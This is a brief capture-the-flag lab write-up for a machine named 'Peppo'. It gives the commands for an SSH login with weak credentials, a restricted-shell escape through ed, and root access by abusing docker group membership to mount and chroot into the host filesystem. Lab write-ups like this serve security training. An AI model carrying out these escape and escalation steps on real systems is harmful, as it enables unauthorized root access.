Peppo

Enumeration

10000/tcp open   snet-sensor-mgmt?
|_auth-owners: eleanor

Initial Access

$ ssh eleanor@192.168.189.60
eleanor:eleanor

-rbash: cat: command not found
eleanor@peppo:~$ ls bin
chmod  chown  ed  ls  mv  ping  sleep  touch

Escaping restricted shell

https://gtfobins.github.io/gtfobins/ed/

$ ed
!/bin/sh

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
$ python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

PrivEsc

Eleanor is in docker group.

$ docker images
redmine             latest              0c8429c66e07        18 months ago       542MB
postgres            latest              adf2b126dda8        18 months ago       313MB

eleanor@peppo:/$ docker run -v /:/mnt --rm -it redmine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)

PreviousClyde NextSirol

Last updated 2 years ago